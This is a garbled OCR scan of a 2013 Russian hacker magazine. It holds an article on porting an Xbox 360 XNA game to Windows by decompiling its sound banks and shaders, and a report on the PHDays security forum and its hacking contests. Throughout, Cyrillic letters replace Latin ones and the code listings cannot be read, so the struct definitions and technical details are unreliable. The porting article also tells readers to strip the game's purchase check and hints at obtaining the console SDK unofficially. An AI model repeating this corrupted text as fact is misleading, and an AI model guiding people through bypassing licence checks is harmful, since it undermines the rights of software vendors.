РЫСЖР пТпапзі-ЕіопТаЫеО-р-РзеІ:; 

ХАСТІпзІіапсеІ-ітіІ: іпзііапсеі-ітіі: ; 

Как мы видим, обе структуры 
(ХАСТЗоипсІВапкЗіплрІеСие и ХАСТЗоипсІВапк- 
СоплрІехСие) наследуют члены структуры 
ХАСТЗоипсІВапкСие. Она включает в себя важный 
флаг. Значение ЬТуреСоплрІех, равное нулю, озна- 
чает, что перед нами ЗіплрІеСие, значение, равное 
единице, идентифицирует тип как СоплрІехСие. 
Впрочем, ЗіплрІеСие и СоплрІехСие, как правило, 
расположены в контейнере как отдельные группы 
и проверять этот флаг не придется. 

Что касается звуков (Зоипсіз), то в ХАСТ 
они представлены двумя типами: ЗіплрІеЗоипсІ 
и СотрІехЗоипсІ. Их можно описать следующими 
структурами: 



5~ЕгисЕ ХАСТБоипсІВапкБоипсІ 



{ 


ВУТЕ 


ЬТуреСотрІех: 1; 


ВУТЕ 


ЬНазБоитЖРСз : 1; 


ВУТЕ 


ЬНаБТпаскКРСБ :1; 


ВУТЕ 


ЬНаБЕТТесЕКРСз : 1 : 


ВУТЕ 


ЬНаБРБРРгезе-ЕБ : 1; 


ВУТЕ 


ЬКезегѵесІ : 3 ; 



ЫСЖР пСаІіе^огѵ; 
ВУТЕ пѴоІише; 
5НСЖТ пРіТсіп ; 
ВУТЕ пРгіогі~Еу; 
ЫСЖР пБіге; 



Б~ЕгисЕ ХАСТБоипсІВапкБітрІеБоипсІ : <-■ 
ХАСТБоипсІВапкБоипсІ 
{ 

ЫСЖР пЫаѵеІпсІех; 

ВУТЕ пВа пкІп сІ ех; 

Ь 



БІіг исЕ ХАСТБоипсІВапкСотрІехБоипсІ : <-■ 
ХАСТБоипсІВапкБоипсІ 

і 

ВУТЕ пТгас кСоип-Е; 

}; 

При чтении каждого звука из таблицы следует 
обратить внимание на флаг ЬТуреСоплрІех: ноль 
означает, что перед нами ЗіплрІеЗоипсІ, едини- 
ца — СотрІехЗоипсІ. При работе с контейнерами 
ЗоипбВапк я ни разу не сталкивался с составны- 
ми звуками, поэтому ничего конкретного о них 
сказать не могу. В дальнейшем мы будем рассма- 
тривать только звуки типа ЗіплрІеЗоипсІ. 

Перед чтением непосредственно реплик нам 
необходимо прочитать хеш-таблицы, содержа- 
щие ссылки на имена реплик. Элементы хеш- 
таблицы описываются структурой: 

5~ЕгисЕ ХАСТНаБІлТаЫеЕпІіпу 

{ 

РЫСЖР пЕгіепсІІуМатеО-р-Рзе-Е; 

МОКР пІ\Іех1:ІпсІе>т; 

1і_ 

Таблица находится по смещению, опреде- 
ленному членом пНазЬТаЫеЕпЕгуОЕЕзеЕ заголов- 
ка, и включает в себя число элементов, соответ- 
ствующее пЫитНазЬЕпЕгіез. Число элементов 
таблицы также соответствует сумме чисел про- 
стых и составных реплик (пЫитЗітрІеСиез + 
пЫитСотрІехСиез). Элементы хеш-таблицы сле- 
дуют в том же порядке, что и реплики, вне зависи- 
мости от их типа. 

Имя реплики представляет собой С-строку, 
которую можно прочитать по смещению 
пРгіепсПуІЧатеОЕЕзеЕ. Член пІЧехЕІпсІех не несет по- 
лезной информации и нам неинтересен. 

Приступим к чтению элементов табли- 
цы ЗіплрІеСиез. Для этого переходим по сме- 
щению пЗітрІеСиеОЕЕзеЕ, указанному в за- 



головке, контейнера и читаем структуры 
ХАСТЗоипсІВапкЗітрІеСие в количестве, опре- 
деленном членом пЫитЗітрІеСиез. С каждой 
простой репликой сопоставлен только один звук, 
который можно прочитать по смещению, опре- 
деленному членом пЗоипсЮЕЕзеТ По завершении 
у нас на руках имеется полная информация, необ- 
ходимая для декомпиляции простых реплик. 

Теперь перейдем к чтению составных ре- 
плик, то есть таблицы СоплрІехСиез. Переходим 
по смещению пСотрІехСиеОЕЕзеЕ, указанно- 
му в заголовке, контейнера и читаем структуры 
ХАСТЗоипсІВапкСоплрІехСие в количестве, опре- 
деленном членом пЫитСотрІехСиез. Для каж- 
дой из составных реплик необходимо проверить 
флаг ЫІзеЗоипсЮЕЕзеЕ. Значение флага, рав- 
ное единице, означает, что реплика использует 
только один звук, который мы определяем тем 
же образом, что и для простой реплики. Если 
же флаг ЬІІзеЗоипсІОІІзеЕ равен нулю, то перед 
нами реплика из нескольких звуков, которые мы 
получим с использованием таблицы вариаций, 
находящейся по смещению пѴагіаЕіопТаЫеОЕЕзеЕ. 
Таблица состоит из заголовка, описываемого 
структурой 

ХАСТБоипсІВапкѴагіаІііопТаЫеНеасІег 

{ 

ипіоп { 

зТгисЕ 

{ 

РЫСЖР сІмЕп'ЕгуСоип'ЕіІб; 

РЫСЖР сІыѴагіа1=іопТѵре:3; 

РЫСЖР сІыТаЫеТуре: 3 ; 

РЫСЖР сІмМемѴагіа'ЕіопОпІ-Оор:!; 
РЫСЖР сІѵЖезегѵесІ :9; 

}; 

РЫСЖР сІыРІа^з ; 

1і 

ЫСЖР пІ.а5І:ІпсІех; 

ЫСЖР пѴагіаЬІеІпсІ ех: 

а также одного или нескольких полей вариа- 
ций. Число вариаций определяется членом 
бѵѵЕпЕгуСоипЕ, а их тип — бѵѵѴагіаІіопТуре. У меня 
нет точных сведений обо всех возможных значе- 
ниях члена бѵѵѴагіайопТуре, однако определить 
тип несложно эмпирически, сверяясь с разме- 
ром таблицы, корректностью значений ее членов 
и спецификацией ХАСТ РгоіесЕ Рііе РогплаЕ. При ра- 
боте с ЭізЬѵѵазЬег я столкнулся только с вариаци- 
ями типа ХАСТЗоипсІВапкЗоипсІѴапаЕіопТаЫеЕпЕ 
гу. Данную вариацию можно описать следующей 
структурой: 

б~Ег исЕ ХАСТБоипсІВапкѴагіа'ЕіопТаЫеЕп-Егу 

і 

РЫСЖР пБоипсЮ-р-Рзе-Е; 

}; 



5-ЕгисЕ <-■ 

ХАСТБоипсІВапкБоипбѴагіа'ЕіопТаЫеЕпІігу : <-■ 
ХАСТ5оипсІВапкѴагіа1:іопТаЫеЕп1:гѵ 

і 

ВУТЕ пКапсІКап^еІ-о; 

ВУТЕ пКапсІКап§еНі; 

Член пЗоипсЮЕЕзеЕ каждой из вариаций, 
как и ясно из его названия, содержит ссылку 
на соответствующий звук. 

После завершения чтения составных реплик 
у нас на руках будет полная информация, необхо- 
димая для декомпиляции всех реплик. Останется 




ХАКЕР 08 /175/ 2013 



Оиізісіе іііе Ьох 



* 7 



только построить таблицу звуков ЗоипсІ и запи- 
сать все настройки в ХАСТ Ргоіесі РМе, попутно 
сверяясь с его спецификацией. Помимо выше- 
описанных таблиц, ЗоипсІ Вапк может содержать 
ЗсІРгорегйез и ТгапзШопТаЫе, однако в работе 
я с ними не сталкивался и ничего не могу сказать 
об их формате. 

хѵѵв 

Ну а теперь перейдем к контейнеру ХѴѴВ. ХѴѴВ — 
это контейнер для ХАСТ ѴѴаѵе Вапк. Он включает 
в себя все аудиодорожки, в формате, соответ- 
ствующем платформе, для которой он собирался: 
ХЬох 360 или ѴѴіпсІоѵѵз. Нас интересует ХЬох 360. 
Рекомендуемый для данной платформы формат 
кодирования звука — ХМА, являющийся прямым 
наследником ѴѴМА для ѴѴіпсІоѵѵз. В некоторых слу- 
чаях могут встретиться и треки формата РСМ, ко- 
торые также поддерживаются ХЬох 360. 

На счастье, контейнером ХѴѴВ интересуются 
многие. Существует множество различных ути- 
лит для его распаковки. Контейнер не содержит 
каких-либо интересных настроек, нам нужны 
только аудиодорожки. Я, к примеру, пользовал- 
ся утилитой ипхѵѵЬ. После извлечения треков 
в ѴѴАѴ-контейнеры их необходимо перекодиро- 
вать из ХМА в АЭРСМ. Для этого можно задей- 
ствовать утилиту хтаепсосіе из состава ХЬох 360 
ЗЭК (ХОК). Где взять ХЬох 360 ЗЭК, попробуй до- 
гадаться сам :). 

Собственно, полученные треки желательно 
разложить по каталогам с именами, соответству- 
ющими именам файлов ХѴѴВ, после чего воссоз- 
дать банки для ѴѴіпсІоѵѵз средствами ХАСТ. Все 
треки ѴѴаѵеВапк в проекте ХАСТ необходимо свя- 
зать со звуками в ЗоипсІ Вапк, а звуки — с соответ- 
ствующими репликами. Для этого у нас есть вся 
необходимая информация. 

ДЕКОМПИЛЯЦИЯ И ВОССОЗДАНИЕ 
ШЕЙДЕРНЫХ ЭФФЕКТОВ 

Модели шейдеров для ХЬох 360 во многом от- 
личаются от тех, что используются на ПК. В про- 
шлом на консоли использовались стандартные 
шейдерные модели, теперь же они полностью 
заменены на ХѴ53.0/ХР53.0, наборы инструкций, 
соответствующие архитектуре графического ядра 
ХЬох 360. 

Полные спецификации ассемблерных ин- 
струкций можно найти в документации к ХЭК. 
Плюс нам оттуда понадобится еще утилита хзсі — 
это консольное приложение, предназначенное 
для декомпиляции шейдеров в листинг команд 
ассемблера. 

Эффекты игр, созданных с Х1\1А, как и про- 
чие ресурсы, хранятся в контейнерах ХЫВ. Если 
содержимое контейнера сжато, то оно должно 
быть подвергнуто декомпрессии тем же мето- 
дом, что мы применяли к прочим ресурсам. Тип 
контент-ридера для эффектов — МісгозоИХпа. 
Ргатеѵѵогк.СопіепЬЕТТесШеасІег. Парсинг эф- 
фекта я не делал, двоичный код шейдеров легко 
найти по его сигнатуре. Размер шейдера опреде- 
ляется двойным словом, находящимся в файле 
прямо перед блоком данных шейдера. Сигнатура 
пиксельного шейдера — 0х102А1100 (Ьід-епсііап). 
Вершинных шейдеров ОізЬѵѵазЬег ѴЗ не содер- 
жит, поэтому их сигнатура мне неизвестна. Если 
эффект содержит несколько техник и проходов, 
придется провести дополнительный анализ кон- 
тейнера ХЫВ для сопоставления имен техник, 
проходов и шейдеров. Но в случае с ЭізЬѵѵазЬег 
это оказалось не нужно. 

Блоки шейдеров необходимо извлечь из кон- 
тейнера и сохранить в отдельные файлы, после 
чего декомпилировать утилитой хзсі, переписать 
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хпа 

ХМА 



ХЫА — это набор инструментов с управляемой средой времени 
выполнения (.МЕТ), созданный МюгозоТЬ Он стремится освобо- 
дить разработку игр от написания «повторяющегося шаблонного 
кода» и объединить различные аспекты разработки игр в одной 
системе. Пакет ХІ\ІА, по словам представителей МісгозоТІ:, позво- 
лит разработчикам игр избежать многих технических трудностей, 
возникающих при написании кода, а также обеспечит существен- 
ное снижение стоимости конечной продукции. Подробнее про 
этого зверя можно почитать тут: ЬіЫѵ/ХЬесѴ . 



с ассемблера на НІ_ЗІ_ и добавить их в проект 
игры ХІ\ІА. 

В целом тут тоже не должно возникнуть про- 
блем с декомпиляцией и последующим восста- 
новлением. Однако я укажу на несколько ключе- 
вых моментов, которые приходится учитывать. 

Во-первых, нужно внимательно ознакомиться 
со спецификой предикатов. Это важно для кор- 
ректного восстановления блоков условного ис- 
полнения. 

Во-вторых, в спецификации не разъясняет- 
ся момент, касающийся операций с шейдерами 
разных размерностей. В листинге встретятся вы- 
ражения, подобные следующим: 

асісі Г0.2М, Г2.ХХХѴ. -Г0.222ІлІ 

Как видишь, в 2Э-вектор записывается ре- 
зультат сложения двух 4Э-векторов. На НІ_ЗІ_ та- 
кое выражение будет выглядеть следующим об- 
разом: 

Г0.2Ы = г 2 .хѵ + -Г0.2Ы ; 

Обрати внимание, что из четырех складывае- 
мых элементов сохраняется результат только двух 
последних. Результат записывается в гѵѵ регистра 
г0. Первые два члена каждого из векторов игнори- 
руются. Есть и другая форма записи: 

асИ Г0.2М . Г2.ХХХѴ, -гѲ.шы 

В данном случае на НІ_ЗІ_ такое выражение бу- 
дет выглядеть следующим образом: 

гѲ.хѵ = г 2 . хѵ + -гѲ.іш; 

Заметь, что члены гѵѵ результата сложения 
пишутся в ху вектора г0. Впрочем, подобные опе- 
рации в документации рассмотрены довольно 
подробно. Главное — не перепутать их с первой 
формой записи. 

В-третьих, размещать переменные и сэмпле- 
ры шейдеров надо в том порядке, в каком они свя- 
заны с регистрами. Часто разработчики делают 
выборку переменных не по имени, а по индексу. 
Это может стать причиной некорректной инициа- 
лизации и работы шейдеров. 



Собственно, с шейдерами все. После полно- 
го воссоздания эффектов на НІ_5І_ добавляем их 
в проект игры ХМА и компилируем. Ну и исправля- 
ем синтаксические ошибки, если они будут выяв- 
лены в процессе компиляции. 

ФИНАЛЬНАЯ ЧАСТЬ. 

ПОРТИРУЕМ КОД ИГРЫ ДЛЯ ѴѴШООѴѴ8 

После извлечения всех ресурсов игры и добавле- 
ния их в проект у нас получается без ошибок со- 
бираемая игра для ѴѴіпсІоѵѵз. Но радоваться пока 
рано, предстоит еще некоторая работа. 

Для начала из кода игры необходимо удалить 
все привязки к Сатег Зегѵісез. Сатег Зегѵісез — 
это компонент ХМА, предоставляющий игре та- 
кую информацию, как количество подключен- 
ных геймпадов, факт приобретения игры, место 
для сохранений. Также он публикует информацию 
о достижениях, очках для досок почета и выпол- 
няет ряд других задач, специфичных для Саплез 
^ог ѴѴіпсІоѵѵз І_іѵе и ХЬох І_іѵе. Если ты не лицензиат 
Майкрософт, пользоваться всеми этими функция- 
ми ты не сможешь. Поэтому необходимо удалить 
или изолировать весь код, относящийся к Сатег 
Зегѵісез, и заменить его аналогичным кодом, при- 
менимым к ѴѴіпсІоѵѵз. Впрочем, ничего сложного 
в этом нет, это лишь вопрос времени. Плюс надо 
удалить проверку игры на предмет ее приобрете- 
ния, то есть разблокировать ее. В конце концов 
у нас получается полностью работоспособная под 
ѴѴіпсІоѵѵз игра. 

Собственно, все. Вот так вот и был портирован 
ТЬе ЭізЬѵѵазЬег: Ѵатріге Зтііе. Как видишь, ниче- 
го сверхсложного в этом нет, по большому счету 
все заключается лишь в упорстве и времени. 

ЗАКЛЮЧЕНИЕ 

История с ЭізЬѵѵазЬег закончилась дружеским 
рукопожатием. Ее разработчик — компания Зка 
ЗШсІіоз официально заявила, что постарается вы- 
пустить версию для РС в ближайшее время. Даль- 
нейшее развитие нелегального порта потеряло 
смысл, а игроки наконец-то получили то, о чем 
мечтали уже несколько лет. 

Лед тронулся, и практически наверняка мы 
скоро услышим о новом проекте, причалившем 
к берегам РС. Может быть, его портирует Вин- 
сент, а может быть — ты. Удачи! 
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РН Оау$: 

УЖЕ В ТРЕТИЙ РАЗ 



Отчет из «диснейленда» 
для безопасников 



Всякий организатор форума пытается придумать что- 
нибудь эдакое, чтобы разнообразить его программу. 
Поэтому конкурсы и прочие активности давно стали при- 
вычными и важными атрибутами мероприятия. Но ор- 
ганизаторы РНРауз, который прошел уже в третий раз, 
бьют все рекорды по их количеству и проработанности. 
Добавляем к ним пять параллельных треков с доклада- 
ми и получаем даже не форум, а праздник безопасни- 
ков, где каждый мог найти то, что ему по душе. 



ЛУЧШИЕДОКЛАДЫ 

Выступления — это то, вокруг чего строится весь форум. В этот 
раз на РЕЮауз обсуждались самые разные темы: от хардкор- 
ных технических до более глобальных (например, как помочь 
молодежи не встать на скользкий путь черного хакинга). Мы со- 
ставили свой хит-парад наиболее интересных, на наш взгляд, 
докладов, мастер-классов и конкурсов. 

Александр Свердлов провел отличный Ііапсіз-оп ІаЬ по ки- 
беррасследованиям. Мирослав Штампар, который активно 
участвует в развитии проекта зціплар, в своем мастер-клас- 
се рассмотрел скрытые возможности этого инструмента. 
Антон Дорфман поведал об основах построения шелл-кода 
под процессоры семейства х86. На реальных примерах и за- 
дачах Андрей Масалович продемонстрировал, как интернет 
можно использовать для конкурентной разведки, обнаруже- 
ния утечек, обхода й\-Р и получения конфиденциальных дан- 
ных. Бешеной популярностью на РНБауз пользовались пар- 
ни из ТОООЦ которые провели мастер-класс по локпикингу 
и рассказали о физической безопасности (все наборы от- 
мычек разобрали за первый же час, мы ухватить не успели). 
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Эта тема не так часто поднимается, но ведь и правда — если 
злоумышленник просто украдет сервер, то никакие системы 
защиты уже не помогут. 

Розарио Валотта рассказал и наглядно продемонстрировал, 
как с помощью социальной инженерии (или даже без нее), ис- 
пользуя панели уведомления браузеров (СНгопле 24, ІЕ9, ІЕЮ), 
можно нарушить безопасность пользователя и выполнить код 
на его компьютере. Очень крутой доклад представили Дмитрий 
Недоспасов и Торстен Шредер: они рассказали, как исполь- 
зовать матрицу РРСА для изготовления собственных инстру- 
ментов, чтобы обеспечить встроенную безопасность. Большой 
ажиотаж вызвал и Алексей Синцов из ІМокіа со своим докладом 
«Ловушки умеют кусаться: обратное проникновение». Вячеслав 
Егошин из РозШѵе ТесНпоІодіез рассказал о загрузке целевого 
файла (и преодолении препятствий) на этапе постэксплуата- 
ции в средах М8 ѴѴіпсІоѵѵз стандартными средствами (статья 
по итогам этого доклада была в прошлом номере ][). Эксперт 
«Лаборатории Касперского» Александр Гостев на примере ВесІ 
ОсЮЬег рассказал, как на основе анализа вредоносного кода 
можно идентифицировать национальность киберпреступников. 

«Пять кошмаров для телекома» — именно так назывался 
доклад Дмитрия Курбатова. Конечно, не все из представлен- 
ных сценариев атак уже были реализованы, но некоторые еще 
как имели место в жизни. Иван Новиков (известный читателям 
как Володя Воронцов) выступил с анализом принципов работы 
современных ѴѴАР и рассказал о том, как их можно обходить. 
Очень интересным получился доклад руководителя НідЫоасІ 
І_аЬ Александра Лямина, который рассмотрел атаки с использо- 
ванием большого количества пакетов минимального размера: 
как им противостоять и какие уязвимости в дизайне современ- 



Зона параллельных 
активностей на РНЮауз 



Один из участников 
форума легко открыл 
замок банкомата 
и не поперхнулся 




ных серверных платформ они эксплуатируют (кстати, напрасно 
его доклад поставили на конец второго дня). 

Специалисты РозШѵе ТесИпоІодіез Александр Тиморин 
и Дмитрий Ефанов представили обзор текущей ситуации с без- 
опасностью в мире 8САЭА и подробно остановились на основ- 
ных индустриальных протоколах (МосІЬиз, ЭІЧРЗ, 87, РВОРІІЧЕТ), 
проанализировав их особенности с точки зрения тестирования 
на проникновения. Трэвис Гудспид рассказал о том, как, ис- 
пользуя фреймворк Расесіапсег с открытым исходным кодом, 
создать эмулятор в пространстве пользователя для протоколов 
Мазз 8Югаде, Нитап Іпіегідсе, РТЭІ и Эеѵісе Рігтѵѵаге ІІрбаЮ 
на РуЮоп. Никак нельзя пройти мимо отличного выступления 
ключевой фигуры третьего РНЭауз — знаменитого Марка Хой- 
зе (создателя многих утилит из набора ТНС, в том числе Нубга), 
который не только поделился массой интересных идей, но и ор- 
ганизовал социальную игру прямо во время доклада. 

КОНКУРСЫ 

Большой ку$Н 

В этом году на РНЭауз снова состоялся конкурс $па1:сТі (он же 
«Большой куш»). Взломщики банковских систем смогли впер- 
вые померяться силами еще на прошлогоднем форуме. Цель 
конкурса — продемонстрировать типовые уязвимости ин- 
тернет-банков, с которыми «позитивы» (так в народе называ- 
ют организаторов РРЮауз — компанию РозШѵе ТесИпоІодіез) 
сталкиваются во время пентестов. Наиболее опасные и просто 
типовые уязвимости отправляются прямиком в РНЭауз іВапк — 
систему ДБО, разработанную специально для соревнований 
в рамках РозШѵе Наск Эауз. 

Условия соревнования просты: десять участников в первый 
день форума получили исходники системы для поиска уязви- 
мостей и написания эксплойтов, то есть для подготовки к фи- 
нальной битве. Как отмечают участники в своих впечатлениях 
о форуме, времени изучать исходники толком не было, вокруг 
была куча интереснейших докладов. Через 24 часа, во второй 
день мероприятия, несколько десятков минут напряженной 
борьбы привели к победе двоих конкурсантов. На этот раз по- 
бедителю удалось добыть 4995 рублей. 

Всего в виртуальном банке, который необходимо было 
«ограбить», хранилось 40 тысяч рублей, причем участники 
могли не только выводить деньги из банка, но и «обчищать» 
счета своих конкурентов. В систему было заложено большое 

Друзья из РозШѵе 
ТесНпоІодіез, в очередной 
раз выражаем вам респект 
за отличный форум! 
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количество возможностей для обогащения: обход капчи че- 
рез авторизацию с мобильной версии, возможность редак- 
тирования чужих шаблонов, слабые пароли, которые можно 
взломать легким движением руки, ХХЕ и другие классные уяз- 
вимости :). 

Деньги, переведенные на свои счета, победители получали 
тут же, так сказать не отходя от кассы. Для этой цели исполь- 
зовались пластиковые карты и — настоящий банкомат! Банко- 
мат, кстати, можно было всячески изучить и поковырять в тече- 
ние всего форума. На примере этого агрегата, а также слайдов 
с удивительными фотками эксперты представили различные 
программные и аппаратные уязвимости, которым подвержены 
автоматические денежные машины. В процессе таких «ковы- 
ряний» обнаружились два зеродея, один из которых позднее 
пытались использовать участники конкурса І_еаѵе АТМ АІопе. 

Кроме того, эксперты по безопасности обнаружили кон- 
структивные уязвимости: первая позволяет открыть банкомат 
и проникнуть в сервисную зону (доступ к системнику) при по- 
мощи подручных средств, а вторая позволяет перейти при по- 
мощи скрепки на экран ввода логина и пароля оператора, где 
можно подобрать данные авторизации и зайти в режим на- 
стройки банкомата! Вот так можно использовать привычные 
устройства :). 

СНооСНоо Рѵѵп 

Настоящим хитом стала модель железной дороги с поездами, 
шлагбаумами и погрузочным краном, управление которыми 
было реализовано с помощью промышленных протоколов 
и оборудования для автоматизации технологических процес- 
сов. Эдакий ЗСАЭА-диснейленд. 

Соревнование состояло из нескольких этапов. Сначала 
участникам нужно было получить контроль над краном для по- 
грузки контейнеров, система управления которым была реали- 
зована с использованием продуктов фирмы Зіетепз (ЗСАЭА 
ѴѴіпСС ТІехіЫе 2008 8РЗ) и ІСРЭАЗ РЕТ-7067 (устройство уда- 
ленного ввода- вывода), работающих на протоколе МосІЬиз ТСР 
Получить доступ и захватить управление краном участникам 
удалось уже буквально через час после начала соревнования. 
С этим заданием справились практически все конкурсанты. 
Возникали ситуации, когда за контроль над краном, мешая друг 
другу, боролись сразу несколько человек, что даже приводило 
к отказам в работе оборудования. 

Далее нужно было захватить контроль над моделью желез- 
ной дороги, которая управлялась системой Зіетепз ЗСАЭА 
ѴѴіпСС 7 8Р2, НМІ панелью Зіетепз ЗІМАТІС КТР600 и кон- 
троллером ЗІМАТІС 87-1200 Рігтѵѵаге ѵЗ.О (протоколы 37 
и РПОРІМЕТ). Это задание оказалось более сложным, однако 
уже к концу первого дня была найдена уязвимость, с помощью 
которой конкурсанты смогли добраться до управления веб- 
интерфейсом ЗСАЭА-системы, а в дальнейшем получить и пол- 
ный доступ. 



К концу второго дня форума РРЮауз система управления 
железной дорогой практически не работала, так как промыш- 
ленные контроллеры и машины со ЗСАЭА-системами постоян- 
но находились под атаками. 

Третий этап многие участники просто не успели пройти из- 
за нехватки времени. Все же несколько попыток использования 
различных утилит и спуфинга ЗСАЭА-системы были предпри- 
няты. Функционирование системы периодически нарушалось, 
но быстро возвращалось в рабочий режим. На данном этапе 
соревнования участникам необходимо было анализировать 
защищенность ЗСАЭА-системы Іпѵепзуз ѴѴопбегѵѵаге ІпТоисІі 
10.6, ОРС-сервера КЕРЗегѵегЕХи промышленного контроллера 
ВоскѵѵеІІ Аиіюплайоп ВЗІ_одіх 1400 (протокол ЭЫРЗ). 

Победителями этого конкурса стали Михаил Елизаров и Ар- 
сений Левшин. 



Железная дорога 
и строительный кран 
были подключены 
к настоящим 8САОА- 
системам 



На этом этапе лабирин- 
та нужно было уболтать 
искусственный интел- 
лект. А это непросто 



Лабиринт 

Надо сказать, что железная дорога с АСУТП была не единствен- 
ным гвоздем программы. В прошлом году забавным элементом 
СТР было задание Эитрзіег Эіѵіпд, в ходе которого участники 
команд должны были искать флаги в куче мусора в прозрачном 
контейнере. Такой элемент шоу имел большой успех и в этом 
году. Но на этот раз организаторы пошли еще дальше, сделав 
одним из заданий прохождение «лабиринта». По сути, это была 
самая настоящая полоса препятствий, для преодоления кото- 
рой нужно было как следует постараться. Лабиринт представ- 
лял собой пять связанных друг с другом прозрачных комнат, 
и в каждой из них участник должен был выполнить определен- 
ное задание, например преодолеть лазерное поле или вскрыть 
дверной замок с помощью отмычки. В общем, не верьте тем, 
кто говорит, что хакерские соревнования — это незрелищно 
и скучно. Но обо всем по порядку. 

Прохождение лабиринта начиналось с комнаты, в которой 
установлен тепловой датчик движения. Он реагирует не столько 
на само движение, сколько на изменение температурного фона, 
так что пройти его — задача нетривиальная. Если обмануть дат- 
чик участнику не удавалось, то срабатывала охранная система 
и звучала сирена, и все нужно было начинать заново. Пройти 
в следующую комнату можно было, либо очень медленно пере- 
двигаясь рядом с датчиком, чтобы он не понимал, что тепловой 
фон изменился, либо проявив смекалку и прикрывшись зонтом 
или большим куском ткани. 



Возникали ситуации, когда за контроль 
над краном, мешая друг другу, боролись 
сразу несколько человек, что даже приво- 
дило к отказам в работе оборудования 





ХАКЕР 08 /175/ 2013 



РНЮауз: уже в третий раз 



9 * 




Во второй комнате нужно было сразиться с искусственным 
интеллектом. Специально для этого конкурса был написан бот, 
который поддерживает беседу в заданном ключе. В «разго- 
воре» с ним участники должны были, применив методы соци- 
альной инженерии, выведать ключ, который необходимо затем 
ввести на клавиатуре для прохода в следующую комнату. Вы- 
глядело это эффектно: множество экранов, на которых (опять 
же как в кино) выводилось изображение девушки — интерфей- 
са суперкомпьютера. 

Лазерное поле, пожалуй, самая зрелищная и самая сложная 
в реализации часть лабиринта. Если кратко, то задача участника 
в комнате с лазерным полем заключалась в том, чтобы выйти 
из нее, не задев лазерные лучи, — все как в голливудском филь- 
ме. Подготовка этого задания заняла месяц, и разработчикам 
пришлось столкнуться с массой сложностей: как сделать ла- 
зерные лучи видимыми и при свете, и в темноте, как устойчиво 
закрепить лазеры и приемники света на стенах комнаты, что- 
бы они не падали от вибраций, вызванных действиями других 
участников в последующих частях лабиринта, — ведь все ком- 
наты соединены... 

Комната с «жучками». Еще одно интереснейшее испытание, 
в ходе которого участники могли почувствовать себя героями 
шпионского боевика. С помощью специального устройства не- 
обходимо было обнаружить эмуляторы закладных устройств 
(«жучков») в комнате, обставленной как обычный рабочий каби- 
нет. Нужно было взять устройство для поиска (так называемый 
детектор частоты) и водить им из стороны в сторону: при при- 
ближении к эмулятору «жучка» звук, издаваемый девайсом, 
усиливался, а при удалении — затихал. 

В следующей комнате участникам необходимо было про- 
демонстрировать свои навыки недеструктивного вскрытия 
замков. Тут как раз очень кстати был набор отмычек, которые 
можно было выбрать из нескольких полезных инструментов 
(участники могли взять с собой в лабиринт ограниченное ко- 
личество таких инструментов). В комнате находилось большое 
количество различных ящиков, открыв которые конкурсанты 
получали бонусы (в основном списывалось общее время про- 
хождения лабиринта). Для выхода из лабиринта нужно было от- 
крыть большой навесной замок. 

Уже после преодоления полосы препятствий участников 
поджидало последнее испытание — бомба. Нужно было пере- 
резать провода до того, как таймер дойдет до нуля. Чтобы по- 
нять, какие провода необходимо перерезать, участники должны 
были решить задачку булевой алгебры, составив таблицу ис- 
тинности. Если был перерезан неправильный провод, то ско- 
рость таймера увеличивалась вдвое. Если же и вторая попытка 
оказывалась неудачной, то бомба «взрывалась» — из пневмо- 
пушки выстреливали конфетти. 

Всего в соревновании участвовало несколько десятков чело- 
век, а победили представители Античата. По словам создателей 
лабиринта, они потратили на разработку всех комнат полосы 
препятствий несколько месяцев, тестируя идеи на собранной 
прямо в офисе экспериментальной прозрачной комнате. При- 
вет Юре Гольцеву, по совместительству одному из редакторов 
][, который под этим предлогом задерживал свои статьи :). □С 



Важной частью РНЮауз уже по традиции стали хакерские соревнования Саріиге 
іііе Над. В этом году участников ждал микс из Зеорагсіу СТР, сервисов класси- 
ческого СТР и, что необычно, заданий с ограниченным временем и постоянно 
растущей ценой очков — так называемых босс-тасков. На протяжении двух дней 
десять команд из шести стран отбивали атаки соперников и самостоятельно 
взламывали их сети. Как обычно, организаторы разработали легенду: участники 
перевоплотились в спасителей сказочного мира О’Еггопт, который хотят унич- 
тожить злобные монстры. 

Болезнь многих СТР в том, что интересны они только непосредственным 
участникам соревнований. Со стороны же это выглядит довольно странно: куча 
людей, компенсируя отсутствие сна энергетиками, что-то делают в своих но- 
утбуках. Организаторы СТР постарались этого избежать, разработав специаль- 
ные мобильные приложения для Ю8 и АпсІгоісІ с визуализацией хода сражения 
в стиле Негоез оТ МідТіІ: апсі Мадіс. На самой площадке в Центре международной 
торговли, помимо монитора с турнирной таблицей и визуализацией, был боль- 
шой экран, на котором демонстрировались мультипликационные ролики, объяс- 
няющие легенду и предваряющие тот или иной сюжетный поворот. 

В игровой набор входили собственно команды, пять командных сервисов (в ле- 
генде игры — шахты), три общих сервиса (ничейные шахты), 25 тасков для реше- 
ния и четыре злодея-босса. Благодаря этим шахтам команды могли добывать ре- 
сурсы (дерево, уголь, железо, нефть, кристаллы), на которые можно было покупать 
таски (то есть открывать их для решения) и золото. Победителем соревнования 
должна была стать команда, набравшая больше всех золота. Итоговая схема битвы 
СТР выглядела следующим образом. Команды должны были атаковать (оборонять) 
сервис (получить или удержать контроль над шахтой), добывать ресурсы, которые 
можно потратить, чтобы открыть таек, решить его и получить скиллы — особые 
игровые очки, которые показывали, какие навыки необходимы для решения кон- 
кретного таска (например, ѴѴеЬ, РІеѵегзе или Рѵѵп) или получения золота. 

Интереснейшим элементом игрового мира были задания-боссы (время их 
жизни составляло три часа). В ходе каждого раунда игры со всех команд со- 
биралось некоторое количество золота (налог), которое отправлялось в копилку 

босса. Если какой-то команде 
удалось решить задание-босс, 
то оставшееся время его жизни 
уменьшалось до 30 минут, 
по истечении которых все 
золото, собранное в качестве 
налога, делилось поровну 
между командами, сумевшими 
решить задание. 

Места в турнирной таблице 
распределялись по количеству 
заработанного драгоценно- 
го металла. Победителем 
стала голландская команда 
ЕіпсІЬагеп, второе место заняли 
американцы из РРР (кстати, 
за них в этом году приехал 
играть сам деоііоі, известный 
разработкой джейлбрейков 
для ЮЗ и РІауЗІаІіоп 3), а про- 
шлогодние победители РНБауз 
СТР из Моге ЗплокесІ І_ее1: 
СІііскеп стали третьими. 
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Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
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СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 
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РогтаГМгіпд 


НслрОѵі 



Авторы: Сеогде 
ІМісоІаои, СНаІкоз 
СЬагаІатЬоиз 
Система: ѴѴіпсІоѵѵз/ 
І_іпих 

ЦРІ.: ННрз://аіШиЬ. 

